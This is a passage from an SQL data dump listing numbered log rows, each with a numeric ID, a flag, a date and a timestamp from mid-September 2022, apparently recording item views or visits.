19:53:38'),(59546,2904,1,'2022-09-17','2022-09-17 19:54:32'),(59547,4845,1,'2022-09-17','2022-09-17 20:06:36'),(59548,4845,1,'2022-09-17','2022-09-17 20:06:57'),(59549,3027,1,'2022-09-17','2022-09-17 20:07:07'),(59550,76,1,'2022-09-17','2022-09-17 20:18:17'),(59551,76,1,'2022-09-17','2022-09-17 20:21:01'),(59552,4845,1,'2022-09-17','2022-09-17 20:32:07'),(59553,5071,1,'2022-09-17','2022-09-17 20:34:39'),(59554,1766,1,'2022-09-17','2022-09-17 20:55:59'),(59555,68,1,'2022-09-17','2022-09-17 20:56:33'),(59556,72,1,'2022-09-17','2022-09-17 20:56:49'),(59557,4837,1,'2022-09-17','2022-09-17 20:57:50'),(59558,72,1,'2022-09-17','2022-09-17 20:57:53'),(59559,4845,1,'2022-09-17','2022-09-17 20:58:45'),(59560,4845,1,'2022-09-17','2022-09-17 21:02:32'),(59561,68,1,'2022-09-17','2022-09-17 21:03:01'),(59562,468,1,'2022-09-17','2022-09-17 21:16:03'),(59563,468,1,'2022-09-17','2022-09-17 21:16:05'),(59564,4391,1,'2022-09-17','2022-09-17 23:42:19'),(59565,3030,1,'2022-09-18','2022-09-18 00:20:24'),(59566,4657,1,'2022-09-18','2022-09-18 00:23:01'),(59567,5037,1,'2022-09-18','2022-09-18 03:00:54'),(59568,5054,1,'2022-09-18','2022-09-18 04:58:04'),(59569,91,1,'2022-09-18','2022-09-18 05:31:02'),(59570,5028,1,'2022-09-18','2022-09-18 05:34:04'),(59571,110,1,'2022-09-18','2022-09-18 06:03:53'),(59572,110,1,'2022-09-18','2022-09-18 06:03:54'),(59573,4983,1,'2022-09-18','2022-09-18 06:14:53'),(59574,3691,1,'2022-09-18','2022-09-18 06:47:46'),(59575,4681,1,'2022-09-18','2022-09-18 07:35:20'),(59576,4341,1,'2022-09-18','2022-09-18 07:46:11'),(59577,4341,1,'2022-09-18','2022-09-18 07:46:22'),(59578,1766,1,'2022-09-18','2022-09-18 08:44:16'),(59579,1766,1,'2022-09-18','2022-09-18 08:44:56'),(59580,3287,1,'2022-09-18','2022-09-18 08:48:42'),(59581,3781,1,'2022-09-18','2022-09-18 09:11:41'),(59582,4697,1,'2022-09-18','2022-09-18 10:35:19'),(59583,3664,1,'2022-09-18','2022-09-18 11:20:28'),(59584,3787,1,'2022-09-18','2022-09-18 11:55:00'),(59585,3787,1,'2022-09-18','2022-09-18 11:55:02'),(59586,4691,1,'2022-09-18','2022-09-18 12:05:28'),(59587,3781,1,'2022-09-18','2022-09-18 12:27:45'),(59588,91,1,'2022-09-18','2022-09-18 13:43:37'),(59589,91,1,'2022-09-18','2022-09-18 13:43:47'),(59590,84,1,'2022-09-18','2022-09-18 14:32:23'),(59591,4963,1,'2022-09-18','2022-09-18 15:09:57'),(59592,4980,1,'2022-09-18','2022-09-18 15:44:09'),(59593,4980,1,'2022-09-18','2022-09-18 15:44:12'),(59594,4412,1,'2022-09-18','2022-09-18 16:47:45'),(59595,5062,1,'2022-09-18','2022-09-18 17:08:55'),(59596,3486,1,'2022-09-18','2022-09-18 17:36:40'),(59597,5050,1,'2022-09-18','2022-09-18 18:04:31'),(59598,5050,1,'2022-09-18','2022-09-18 18:05:05'),(59599,2309,1,'2022-09-18','2022-09-18 18:32:22'),(59600,4938,1,'2022-09-18','2022-09-18 19:00:15'),(59601,4938,1,'2022-09-18','2022-09-18 19:09:51'),(59602,4608,1,'2022-09-18','2022-09-18 19:59:44'),(59603,4329,1,'2022-09-18','2022-09-18 20:21:46'),(59604,4329,1,'2022-09-18','2022-09-18 20:22:11'),(59605,4457,1,'2022-09-18','2022-09-18 20:58:52'),(59606,4944,1,'2022-09-18','2022-09-18 21:10:01'),(59607,4944,1,'2022-09-18','2022-09-18 21:10:03'),(59608,4765,1,'2022-09-18','2022-09-18 21:13:30'),(59609,4765,1,'2022-09-18','2022-09-18 21:13:31'),(59610,4765,1,'2022-09-18','2022-09-18 21:13:33'),(59611,3117,1,'2022-09-18','2022-09-18 22:19:03'),(59612,3117,1,'2022-09-18','2022-09-18 22:19:04'),(59613,467,1,'2022-09-18','2022-09-18 22:21:45'),(59614,4762,1,'2022-09-18','2022-09-18 22:51:51'),(59615,4762,1,'2022-09-18','2022-09-18 22:51:53'),(59616,91,1,'2022-09-18','2022-09-18 23:49:10'),(59617,5033,1,'2022-09-19','2022-09-19 00:08:18'),(59618,5033,1,'2022-09-19','2022-09-19 00:08:20'),(59619,5033,1,'2022-09-19','2022-09-19 00:08:29'),(59620,5005,1,'2022-09-19','2022-09-19 00:17:33'),(59621,1870,1,'2022-09-19','2022-09-19 01:05:40'),(59622,1870,1,'2022-09-19','2022-09-19 01:05:41'),(59623,2309,1,'2022-09-19','2022-09-19 02:48:24'),(59624,5024,1,'2022-09-19','2022-09-19 05:24:41'),(59625,5024,1,'2022-09-19','2022-09-19 05:25:29'),(59626,4627,1,'2022-09-19','2022-09-19 05:49:14'),(59627,4930,1,'2022-09-19','2022-09-19 06:13:52'),(59628,1582,1,'2022-09-19','2022-09-19 06:38:22'),(59629,5071,1,'2022-09-19','2022-09-19 07:23:16'),(59630,5020,1,'2022-09-19','2022-09-19 07:36:57'),(59631,3069,1,'2022-09-19','2022-09-19 07:43:00'),(59632,5067,1,'2022-09-19','2022-09-19 08:01:34'),(59633,5067,1,'2022-09-19','2022-09-19 08:02:18'),(59634,1602,1,'2022-09-19','2022-09-19 08:21:09'),(59635,5080,1,'2022-09-19','2022-09-19 08:34:15'),(59636,5071,1,'2022-09-19','2022-09-19 08:35:44'),(59637,68,1,'2022-09-19','2022-09-19 08:52:21'),(59638,4412,1,'2022-09-19','2022-09-19 08:58:25'),(59639,1544,1,'2022-09-19','2022-09-19 09:04:38'),(59640,76,1,'2022-09-19','2022-09-19 09:32:35'),(59641,68,1,'2022-09-19','2022-09-19 09:32:47'),(59642,3090,1,'2022-09-19','2022-09-19 09:49:54'),(59643,76,1,'2022-09-19','2022-09-19 09:59:01'),(59644,68,1,'2022-09-19','2022-09-19 09:59:08'),(59645,76,1,'2022-09-19','2022-09-19 10:07:22'),(59646,91,1,'2022-09-19','2022-09-19 10:08:25'),(59647,4396,1,'2022-09-19','2022-09-19 10:14:45'),(59648,1612,1,'2022-09-19','2022-09-19 10:25:34'),(59649,1544,1,'2022-09-19','2022-09-19 10:33:10'),(59650,4832,1,'2022-09-19','2022-09-19 10:49:40'),(59651,74,1,'2022-09-19','2022-09-19 10:51:11'),(59652,1582,1,'2022-09-19','2022-09-19 10:52:21'),(59653,4776,1,'2022-09-19','2022-09-19 11:07:14'),(59654,4412,1,'2022-09-19','2022-09-19 11:32:37'),(59655,4802,1,'2022-09-19','2022-09-19 11:43:39'),(59656,91,1,'2022-09-19','2022-09-19 11:44:27'),(59657,4542,1,'2022-09-19','2022-09-19 11:44:52'),(59658,91,1,'2022-09-19','2022-09-19 11:47:27'),(59659,4444,1,'2022-09-19','2022-09-19 11:47:56'),(59660,3083,1,'2022-09-19','2022-09-19 11:51:31'),(59661,3097,1,'2022-09-19','2022-09-19 11:55:39'),(59662,4966,1,'2022-09-19','2022-09-19 12:30:20'),(59663,5076,1,'2022-09-19','2022-09-19 12:33:28'),(59664,5076,1,'2022-09-19','2022-09-19 12:55:06'),(59665,5076,1,'2022-09-19','2022-09-19 12:55:27'),(59666,4412,1,'2022-09-19','2022-09-19 13:04:01'),(59667,1604,1,'2022-09-19','2022-09-19 13:26:52'),(59668,5080,1,'2022-09-19','2022-09-19 13:29:48'),(59669,5080,1,'2022-09-19','2022-09-19 13:30:09'),(59670,1604,1,'2022-09-19','2022-09-19 13:40:23'),(59671,91,1,'2022-09-19','2022-09-19 13:46:19'),(59672,4976,1,'2022-09-19','2022-09-19 14:04:34'),(59673,4963,1,'2022-09-19','2022-09-19 14:19:05'),(59674,4576,1,'2022-09-19','2022-09-19 14:38:17'),(59675,4576,1,'2022-09-19','2022-09-19 14:38:29'),(59676,3731,1,'2022-09-19','2022-09-19 15:12:50'),(59677,1602,1,'2022-09-19','2022-09-19 15:25:07'),(59678,3083,1,'2022-09-19','2022-09-19 15:58:33'),(59679,1602,1,'2022-09-19','2022-09-19 16:13:47'),(59680,1602,1,'2022-09-19','2022-09-19 16:13:49'),(59681,1594,1,'2022-09-19','2022-09-19 16:58:34'),(59682,4966,1,'2022-09-19','2022-09-19 17:06:07'),(59683,2410,1,'2022-09-19','2022-09-19 17:21:27'),(59684,2410,1,'2022-09-19','2022-09-19 17:24:20'),(59685,1596,1,'2022-09-19','2022-09-19 17:28:47'),(59686,1596,1,'2022-09-19','2022-09-19 17:29:34'),(59687,1610,1,'2022-09-19','2022-09-19 17:37:25'),(59688,1610,1,'2022-09-19','2022-09-19 17:37:27'),(59689,5071,1,'2022-09-19','2022-09-19 17:50:42'),(59690,3083,1,'2022-09-19','2022-09-19 17:53:22'),(59691,2609,1,'2022-09-19','2022-09-19 18:09:18'),(59692,2609,1,'2022-09-19','2022-09-19 18:09:20'),(59693,1544,1,'2022-09-19','2022-09-19 18:13:25'),(59694,1544,1,'2022-09-19','2022-09-19 18:13:25'),(59695,1588,1,'2022-09-19','2022-09-19 18:19:49'),(59696,2558,1,'2022-09-19','2022-09-19 18:20:04'),(59697,4960,1,'2022-09-19','2022-09-19 18:22:21'),(59698,4960,1,'2022-09-19','2022-09-19 18:22:24'),(59699,1586,1,'2022-09-19','2022-09-19 18:31:43'),(59700,1586,1,'2022-09-19','2022-09-19 18:31:45'),(59701,467,1,'2022-09-19','2022-09-19 18:58:20'),(59702,1877,1,'2022-09-19','2022-09-19 19:16:29'),(59703,1877,1,'2022-09-19','2022-09-19 19:16:31'),(59704,4566,1,'2022-09-19','2022-09-19 19:38:53'),(59705,1722,1,'2022-09-19','2022-09-19 19:38:58'),(59706,1722,1,'2022-09-19','2022-09-19 19:39:13'),(59707,1722,1,'2022-09-19','2022-09-19 19:39:49'),(59708,1722,1,'2022-09-19','2022-09-19 19:40:11'),(59709,1582,1,'2022-09-19','2022-09-19 19:46:34'),(59710,1582,1,'2022-09-19','2022-09-19 19:48:33'),(59711,1582,1,'2022-09-19','2022-09-19 19:50:42'),(59712,1747,1,'2022-09-19','2022-09-19 20:01:17'),(59713,1747,1,'2022-09-19','2022-09-19 20:01:19'),(59714,2293,1,'2022-09-19','2022-09-19 20:47:27'),(59715,4520,1,'2022-09-19','2022-09-19 21:33:36'),(59716,4520,1,'2022-09-19','2022-09-19 21:33:38'),(59717,4706,1,'2022-09-19','2022-09-19 22:19:22'),(59718,4587,1,'2022-09-19','2022-09-19 22:20:04'),(59719,4694,1,'2022-09-19','2022-09-19 22:25:00'),(59720,4677,1,'2022-09-19','2022-09-19 22:30:36'),(59721,4700,1,'2022-09-19','2022-09-19 22:41:53'),(59722,4709,1,'2022-09-19','2022-09-19 22:47:30'),(59723,1726,1,'2022-09-19','2022-09-19 22:52:51'),(59724,4712,1,'2022-09-19','2022-09-19 22:53:12'),(59725,1726,1,'2022-09-19','2022-09-19 22:54:04'),(59726,1726,1,'2022-09-19','2022-09-19 22:55:32'),(59727,1726,1,'2022-09-19','2022-09-19 22:56:49'),(59728,91,1,'2022-09-19','2022-09-19 22:58:43'),(59729,4612,1,'2022-09-19','2022-09-19 23:00:23'),(59730,4566,1,'2022-09-19','2022-09-19 23:04:46'),(59731,4703,1,'2022-09-19','2022-09-19 23:15:37'),(59732,74,1,'2022-09-19','2022-09-19 23:26:53'),(59733,1726,1,'2022-09-19','2022-09-19 23:28:14'),(59734,1726,1,'2022-09-19','2022-09-19 23:28:48'),(59735,4551,1,'2022-09-19','2022-09-19 23:38:23'),(59736,4514,1,'2022-09-19','2022-09-19 23:49:24'),(59737,4529,1,'2022-09-20','2022-09-20 00:00:37'),(59738,2904,1,'2022-09-20','2022-09-20 00:37:21'),(59739,4517,1,'2022-09-20','2022-09-20 00:54:37'),(59740,4524,1,'2022-09-20','2022-09-20 01:12:37'),(59741,4520,1,'2022-09-20','2022-09-20 01:35:29'),(59742,1718,1,'2022-09-20','2022-09-20 01:37:22'),(59743,4454,1,'2022-09-20','2022-09-20 01:54:01'),(59744,570,1,'2022-09-20','2022-09-20 02:09:47'),(59745,76,1,'2022-09-20','2022-09-20 02:10:30'),(59746,1602,1,'2022-09-20','2022-09-20 02:56:21'),(59747,1602,1,'2022-09-20','2022-09-20 02:56:23'),(59748,68,1,'2022-09-20','2022-09-20 02:56:41'),(59749,68,1,'2022-09-20','2022-09-20 02:59:22'),(59750,1586,1,'2022-09-20','2022-09-20 03:10:34'),(59751,1586,1,'2022-09-20','2022-09-20 03:10:47'),(59752,1588,1,'2022-09-20','2022-09-20 03:29:19'),(59753,1588,1,'2022-09-20','2022-09-20 03:29:20'),(59754,1610,1,'2022-09-20','2022-09-20 04:25:18'),(59755,1610,1,'2022-09-20','2022-09-20 04:25:23'),(59756,1544,1,'2022-09-20','2022-09-20 04:30:25'),(59757,4363,1,'2022-09-20','2022-09-20 04:50:58'),(59758,4363,1,'2022-09-20','2022-09-20 04:51:00'),(59759,4520,1,'2022-09-20','2022-09-20 05:18:04'),(59760,1594,1,'2022-09-20','2022-09-20 05:28:51'),(59761,3781,1,'2022-09-20','2022-09-20 05:42:13'),(59762,3781,1,'2022-09-20','2022-09-20 05:42:14'),(59763,467,1,'2022-09-20','2022-09-20 06:00:18'),(59764,467,1,'2022-09-20','2022-09-20 06:00:20'),(59765,3764,1,'2022-09-20','2022-09-20 08:09:37'),(59766,4762,1,'2022-09-20','2022-09-20 08:58:12'),(59767,4762,1,'2022-09-20','2022-09-20 08:58:14'),(59768,2159,1,'2022-09-20','2022-09-20 09:02:47'),(59769,2159,1,'2022-09-20','2022-09-20 09:03:09'),(59770,1604,1,'2022-09-20','2022-09-20 09:12:25'),(59771,80,1,'2022-09-20','2022-09-20 09:12:56'),(59772,1602,1,'2022-09-20','2022-09-20 09:52:21'),(59773,1602,1,'2022-09-20','2022-09-20 09:53:04'),(59774,1872,1,'2022-09-20','2022-09-20 09:53:45'),(59775,2813,1,'2022-09-20','2022-09-20 10:30:35'),(59776,80,1,'2022-09-20','2022-09-20 10:35:26'),(59777,80,1,'2022-09-20','2022-09-20 10:38:17'),(59778,1707,1,'2022-09-20','2022-09-20 10:44:56'),(59779,80,1,'2022-09-20','2022-09-20 11:05:04'),(59780,87,1,'2022-09-20','2022-09-20 11:08:28'),(59781,488,1,'2022-09-20','2022-09-20 11:08:37'),(59782,87,1,'2022-09-20','2022-09-20 11:08:43'),(59783,5101,1,'2022-09-20','2022-09-20 11:42:13'),(59784,2813,1,'2022-09-20','2022-09-20 12:00:33'),(59785,2813,1,'2022-09-20','2022-09-20 12:00:35'),(59786,5101,1,'2022-09-20','2022-09-20 12:10:11'),(59787,87,1,'2022-09-20','2022-09-20 12:32:05'),(59788,87,1,'2022-09-20','2022-09-20 12:32:43'),(59789,4930,1,'2022-09-20','2022-09-20 12:33:02'),(59790,4911,1,'2022-09-20','2022-09-20 12:33:17'),(59791,4930,1,'2022-09-20','2022-09-20 12:34:20'),(59792,4930,1,'2022-09-20','2022-09-20 12:34:27'),(59793,91,1,'2022-09-20','2022-09-20 12:34:37'),(59794,4911,1,'2022-09-20','2022-09-20 12:35:10'),(59795,1870,1,'2022-09-20','2022-09-20 12:36:53'),(59796,4976,1,'2022-09-20','2022-09-20 12:38:23'),(59797,68,1,'2022-09-20','2022-09-20 12:41:08'),(59798,87,1,'2022-09-20','2022-09-20 12:43:40'),(59799,76,1,'2022-09-20','2022-09-20 12:49:26'),(59800,91,1,'2022-09-20','2022-09-20 12:50:57'),(59801,68,1,'2022-09-20','2022-09-20 12:53:31'),(59802,1870,1,'2022-09-20','2022-09-20 13:01:54'),(59803,5005,1,'2022-09-20','2022-09-20 13:19:32'),(59804,91,1,'2022-09-20','2022-09-20 14:02:43'),(59805,3781,1,'2022-09-20','2022-09-20 14:16:23'),(59806,3781,1,'2022-09-20','2022-09-20 14:16:26'),(59807,89,1,'2022-09-20','2022-09-20 14:39:02'),(59808,1598,1,'2022-09-20','2022-09-20 14:58:06'),(59809,470,1,'2022-09-20','2022-09-20 15:16:04'),(59810,4950,1,'2022-09-20','2022-09-20 15:16:58'),(59811,470,1,'2022-09-20','2022-09-20 15:17:27'),(59812,5005,1,'2022-09-20','2022-09-20 15:29:22'),(59813,1600,1,'2022-09-20','2022-09-20 15:53:56'),(59814,1594,1,'2022-09-20','2022-09-20 15:56:15'),(59815,1614,1,'2022-09-20','2022-09-20 16:35:22'),(59816,4911,1,'2022-09-20','2022-09-20 16:39:32'),(59817,91,1,'2022-09-20','2022-09-20 16:42:22'),(59818,570,1,'2022-09-20','2022-09-20 16:58:47'),(59819,76,1,'2022-09-20','2022-09-20 16:59:38'),(59820,4436,1,'2022-09-20','2022-09-20 17:48:33'),(59821,1774,1,'2022-09-20','2022-09-20 17:48:38'),(59822,3438,1,'2022-09-20','2022-09-20 18:13:07'),(59823,108,1,'2022-09-20','2022-09-20 18:27:21'),(59824,108,1,'2022-09-20','2022-09-20 18:29:44'),(59825,4966,1,'2022-09-20','2022-09-20 18:30:50'),(59826,4976,1,'2022-09-20','2022-09-20 18:58:15'),(59827,108,1,'2022-09-20','2022-09-20 20:22:23'),(59828,108,1,'2022-09-20','2022-09-20 20:22:26'),(59829,1586,1,'2022-09-20','2022-09-20 21:13:33'),(59830,1586,1,'2022-09-20','2022-09-20 21:15:43'),(59831,87,1,'2022-09-20','2022-09-20 21:32:41'),(59832,1774,1,'2022-09-20','2022-09-20 23:03:10'),(59833,3764,1,'2022-09-21','2022-09-21 00:13:06'),(59834,4983,1,'2022-09-21','2022-09-21 01:43:06'),(59835,4983,1,'2022-09-21','2022-09-21 01:43:07'),(59836,91,1,'2022-09-21','2022-09-21 03:42:44'),(59837,5101,1,'2022-09-21','2022-09-21 03:46:22'),(59838,89,1,'2022-09-21','2022-09-21 04:01:45'),(59839,1544,1,'2022-09-21','2022-09-21 04:03:04'),(59840,1544,1,'2022-09-21','2022-09-21 04:13:03'),(59841,89,1,'2022-09-21','2022-09-21 04:13:24'),(59842,1582,1,'2022-09-21','2022-09-21 04:13:35'),(59843,89,1,'2022-09-21','2022-09-21 04:18:42'),(59844,89,1,'2022-09-21','2022-09-21 04:19:18'),(59845,1584,1,'2022-09-21','2022-09-21 04:19:51'),(59846,89,1,'2022-09-21','2022-09-21 04:23:30'),(59847,1584,1,'2022-09-21','2022-09-21 04:23:48'),(59848,89,1,'2022-09-21','2022-09-21 04:24:53'),(59849,1586,1,'2022-09-21','2022-09-21 05:33:30'),(59850,1586,1,'2022-09-21','2022-09-21 05:33:32'),(59851,1582,1,'2022-09-21','2022-09-21 05:53:03'),(59852,108,1,'2022-09-21','2022-09-21 06:17:43'),(59853,108,1,'2022-09-21','2022-09-21 06:17:45'),(59854,1768,1,'2022-09-21','2022-09-21 06:18:31'),(59855,5005,1,'2022-09-21','2022-09-21 06:31:08'),(59856,108,1,'2022-09-21','2022-09-21 06:46:53'),(59857,1584,1,'2022-09-21','2022-09-21 07:02:48'),(59858,2457,1,'2022-09-21','2022-09-21 07:03:30'),(59859,5005,1,'2022-09-21','2022-09-21 07:09:09'),(59860,5005,1,'2022-09-21','2022-09-21 07:22:42'),(59861,4768,1,'2022-09-21','2022-09-21 07:45:14'),(59862,1584,1,'2022-09-21','2022-09-21 07:47:42'),(59863,4436,1,'2022-09-21','2022-09-21 07:48:17'),(59864,4432,1,'2022-09-21','2022-09-21 07:49:36'),(59865,5076,1,'2022-09-21','2022-09-21 07:50:31'),(59866,89,1,'2022-09-21','2022-09-21 08:20:57'),(59867,68,1,'2022-09-21','2022-09-21 08:30:36'),(59868,4941,1,'2022-09-21','2022-09-21 08:33:31'),(59869,2248,1,'2022-09-21','2022-09-21 09:17:41'),(59870,1596,1,'2022-09-21','2022-09-21 09:23:52'),(59871,1596,1,'2022-09-21','2022-09-21 09:31:45'),(59872,3083,1,'2022-09-21','2022-09-21 09:59:20'),(59873,4941,1,'2022-09-21','2022-09-21 10:02:54'),(59874,3083,1,'2022-09-21','2022-09-21 10:19:43'),(59875,84,1,'2022-09-21','2022-09-21 10:23:13'),(59876,84,1,'2022-09-21','2022-09-21 10:23:21'),(59877,1870,1,'2022-09-21','2022-09-21 10:24:14'),(59878,3251,1,'2022-09-21','2022-09-21 10:25:19'),(59879,84,1,'2022-09-21','2022-09-21 10:25:32'),(59880,1870,1,'2022-09-21','2022-09-21 10:25:40'),(59881,84,1,'2022-09-21','2022-09-21 10:25:42'),(59882,3083,1,'2022-09-21','2022-09-21 10:25:46'),(59883,3764,1,'2022-09-21','2022-09-21 10:37:33'),(59884,3764,1,'2022-09-21','2022-09-21 10:37:36'),(59885,4341,1,'2022-09-21','2022-09-21 10:37:52'),(59886,335,1,'2022-09-21','2022-09-21 10:39:29'),(59887,68,1,'2022-09-21','2022-09-21 10:48:30'),(59888,5101,1,'2022-09-21','2022-09-21 10:55:02'),(59889,80,1,'2022-09-21','2022-09-21 10:56:11'),(59890,91,1,'2022-09-21','2022-09-21 11:09:27'),(59891,4694,1,'2022-09-21','2022-09-21 11:14:52'),(59892,5076,1,'2022-09-21','2022-09-21 11:17:22'),(59893,5076,1,'2022-09-21','2022-09-21 11:17:22'),(59894,91,1,'2022-09-21','2022-09-21 11:17:57'),(59895,4930,1,'2022-09-21','2022-09-21 11:18:14'),(59896,89,1,'2022-09-21','2022-09-21 11:19:23'),(59897,89,1,'2022-09-21','2022-09-21 11:20:14'),(59898,89,1,'2022-09-21','2022-09-21 11:20:42'),(59899,5033,1,'2022-09-21','2022-09-21 11:21:05'),(59900,89,1,'2022-09-21','2022-09-21 11:22:12'),(59901,89,1,'2022-09-21','2022-09-21 11:22:15'),(59902,72,1,'2022-09-21','2022-09-21 11:22:45'),(59903,2558,1,'2022-09-21','2022-09-21 11:27:11'),(59904,68,1,'2022-09-21','2022-09-21 11:33:08'),(59905,4930,1,'2022-09-21','2022-09-21 11:43:25'),(59906,1877,1,'2022-09-21','2022-09-21 11:45:26'),(59907,4420,1,'2022-09-21','2022-09-21 12:10:03'),(59908,2309,1,'2022-09-21','2022-09-21 12:10:40'),(59909,1722,1,'2022-09-21','2022-09-21 12:41:47'),(59910,1722,1,'2022-09-21','2022-09-21 12:42:24'),(59911,1722,1,'2022-09-21','2022-09-21 12:42:32'),(59912,1722,1,'2022-09-21','2022-09-21 12:42:47'),(59913,87,1,'2022-09-21','2022-09-21 13:20:51'),(59914,487,1,'2022-09-21','2022-09-21 13:21:49'),(59915,486,1,'2022-09-21','2022-09-21 13:22:04'),(59916,487,1,'2022-09-21','2022-09-21 13:22:45'),(59917,487,1,'2022-09-21','2022-09-21 13:23:01'),(59918,1877,1,'2022-09-21','2022-09-21 13:25:08'),(59919,1608,1,'2022-09-21','2022-09-21 13:27:14'),(59920,91,1,'2022-09-21','2022-09-21 13:33:11'),(59921,91,1,'2022-09-21','2022-09-21 13:33:13'),(59922,4971,1,'2022-09-21','2022-09-21 13:37:16'),(59923,4930,1,'2022-09-21','2022-09-21 14:00:42'),(59924,4911,1,'2022-09-21','2022-09-21 14:00:55'),(59925,87,1,'2022-09-21','2022-09-21 14:01:25'),(59926,89,1,'2022-09-21','2022-09-21 14:02:03'),(59927,89,1,'2022-09-21','2022-09-21 14:02:29'),(59928,3030,1,'2022-09-21','2022-09-21 14:12:20'),(59929,91,1,'2022-09-21','2022-09-21 14:18:17'),(59930,1722,1,'2022-09-21','2022-09-21 14:19:04'),(59931,1722,1,'2022-09-21','2022-09-21 14:19:13'),(59932,1722,1,'2022-09-21','2022-09-21 14:19:35'),(59933,1722,1,'2022-09-21','2022-09-21 14:20:05'),(59934,72,1,'2022-09-21','2022-09-21 14:24:21'),(59935,2989,1,'2022-09-21','2022-09-21 14:40:39'),(59936,1722,1,'2022-09-21','2022-09-21 14:45:28'),(59937,72,1,'2022-09-21','2022-09-21 14:50:27'),(59938,5109,1,'2022-09-21','2022-09-21 14:50:48'),(59939,5101,1,'2022-09-21','2022-09-21 14:50:55'),(59940,72,1,'2022-09-21','2022-09-21 14:52:31'),(59941,5106,1,'2022-09-21','2022-09-21 14:52:42'),(59942,72,1,'2022-09-21','2022-09-21 14:53:50'),(59943,1766,1,'2022-09-21','2022-09-21 14:56:30'),(59944,87,1,'2022-09-21','2022-09-21 15:04:06'),(59945,5101,1,'2022-09-21','2022-09-21 15:25:41'),(59946,5101,1,'2022-09-21','2022-09-21 15:25:55'),(59947,4556,1,'2022-09-21','2022-09-21 15:48:11'),(59948,4556,1,'2022-09-21','2022-09-21 15:51:46'),(59949,1588,1,'2022-09-21','2022-09-21 15:57:16'),(59950,72,1,'2022-09-21','2022-09-21 16:15:51'),(59951,5113,1,'2022-09-21','2022-09-21 16:16:06'),(59952,72,1,'2022-09-21','2022-09-21 16:16:28'),(59953,5116,1,'2022-09-21','2022-09-21 16:16:35'),(59954,72,1,'2022-09-21','2022-09-21 16:16:52'),(59955,5119,1,'2022-09-21','2022-09-21 16:16:56'),(59956,3278,1,'2022-09-21','2022-09-21 16:34:51'),(59957,108,1,'2022-09-21','2022-09-21 16:51:40'),(59958,72,1,'2022-09-21','2022-09-21 16:51:44'),(59959,108,1,'2022-09-21','2022-09-21 16:54:46'),(59960,1544,1,'2022-09-21','2022-09-21 17:03:41'),(59961,1544,1,'2022-09-21','2022-09-21 17:03:43'),(59962,1594,1,'2022-09-21','2022-09-21 17:12:03'),(59963,1594,1,'2022-09-21','2022-09-21 17:12:04'),(59964,1594,1,'2022-09-21','2022-09-21 17:19:02'),(59965,1594,1,'2022-09-21','2022-09-21 17:29:30'),(59966,1584,1,'2022-09-21','2022-09-21 17:36:38'),(59967,3271,1,'2022-09-21','2022-09-21 18:21:41'),(59968,3271,1,'2022-09-21','2022-09-21 18:21:53'),(59969,1695,1,'2022-09-21','2022-09-21 18:25:41'),(59970,3764,1,'2022-09-21','2022-09-21 18:27:36'),(59971,1582,1,'2022-09-21','2022-09-21 19:16:30'),(59972,1582,1,'2022-09-21','2022-09-21 19:17:41'),(59973,470,1,'2022-09-21','2022-09-21 19:40:59'),(59974,470,1,'2022-09-21','2022-09-21 19:41:38'),(59975,1600,1,'2022-09-21','2022-09-21 20:05:25'),(59976,1600,1,'2022-09-21','2022-09-21 20:05:27'),(59977,1877,1,'2022-09-21','2022-09-21 20:15:30'),(59978,2152,1,'2022-09-21','2022-09-21 20:52:24'),(59979,2152,1,'2022-09-21','2022-09-21 20:52:25'),(59980,1602,1,'2022-09-21','2022-09-21 20:57:27'),(59981,3313,1,'2022-09-21','2022-09-21 21:14:55'),(59982,3278,1,'2022-09-21','2022-09-21 22:13:39'),(59983,3245,1,'2022-09-21','2022-09-21 22:43:32'),(59984,1739,1,'2022-09-21','2022-09-21 23:04:35'),(59985,481,1,'2022-09-21','2022-09-21 23:07:47'),(59986,481,1,'2022-09-21','2022-09-21 23:07:49'),(59987,1741,1,'2022-09-21','2022-09-21 23:35:00'),(59988,3742,1,'2022-09-22','2022-09-22 00:12:42'),(59989,87,1,'2022-09-22','2022-09-22 01:03:44'),(59990,87,1,'2022-09-22','2022-09-22 01:03:48'),(59991,4966,1,'2022-09-22','2022-09-22 01:11:12'),(59992,72,1,'2022-09-22','2022-09-22 01:47:41'),(59993,91,1,'2022-09-22','2022-09-22 02:12:39'),(59994,91,1,'2022-09-22','2022-09-22 02:12:43'),(59995,108,1,'2022-09-22','2022-09-22 02:32:57'),(59996,108,1,'2022-09-22','2022-09-22 02:35:01'),(59997,5119,1,'2022-09-22','2022-09-22 03:01:34'),(59998,1544,1,'2022-09-22','2022-09-22 03:26:15'),(59999,5109,1,'2022-09-22','2022-09-22 03:50:28'),(60000,1600,1,'2022-09-22','2022-09-22 04:14:58'),(60001,1600,1,'2022-09-22','2022-09-22 04:15:00'),(60002,570,1,'2022-09-22','2022-09-22 04:30:53'),(60003,472,1,'2022-09-22','2022-09-22 04:49:06'),(60004,5116,1,'2022-09-22','2022-09-22 05:22:09'),(60005,72,1,'2022-09-22','2022-09-22 05:40:20'),(60006,5113,1,'2022-09-22','2022-09-22 05:55:42'),(60007,1592,1,'2022-09-22','2022-09-22 05:59:07'),(60008,1602,1,'2022-09-22','2022-09-22 06:27:25'),(60009,3313,1,'2022-09-22','2022-09-22 07:25:46'),(60010,4335,1,'2022-09-22','2022-09-22 08:27:58'),(60011,80,1,'2022-09-22','2022-09-22 08:30:57'),(60012,68,1,'2022-09-22','2022-09-22 08:34:17'),(60013,2309,1,'2022-09-22','2022-09-22 08:42:20'),(60014,2309,1,'2022-09-22','2022-09-22 08:42:39'),(60015,1588,1,'2022-09-22','2022-09-22 08:47:59'),(60016,1588,1,'2022-09-22','2022-09-22 08:49:21'),(60017,469,1,'2022-09-22','2022-09-22 09:03:15'),(60018,469,1,'2022-09-22','2022-09-22 09:03:59'),(60019,1582,1,'2022-09-22','2022-09-22 09:15:44'),(60020,1544,1,'2022-09-22','2022-09-22 10:19:18'),(60021,1600,1,'2022-09-22','2022-09-22 10:22:37'),(60022,1877,1,'2022-09-22','2022-09-22 11:12:05'),(60023,84,1,'2022-09-22','2022-09-22 11:13:04'),(60024,3694,1,'2022-09-22','2022-09-22 11:15:36'),(60025,1594,1,'2022-09-22','2022-09-22 11:19:21'),(60026,80,1,'2022-09-22','2022-09-22 11:19:47'),(60027,4996,1,'2022-09-22','2022-09-22 11:19:53'),(60028,1594,1,'2022-09-22','2022-09-22 11:22:24'),(60029,4996,1,'2022-09-22','2022-09-22 12:15:43'),(60030,4996,1,'2022-09-22','2022-09-22 12:15:45'),(60031,1608,1,'2022-09-22','2022-09-22 12:26:33'),(60032,2503,1,'2022-09-22','2022-09-22 12:41:43'),(60033,2148,1,'2022-09-22','2022-09-22 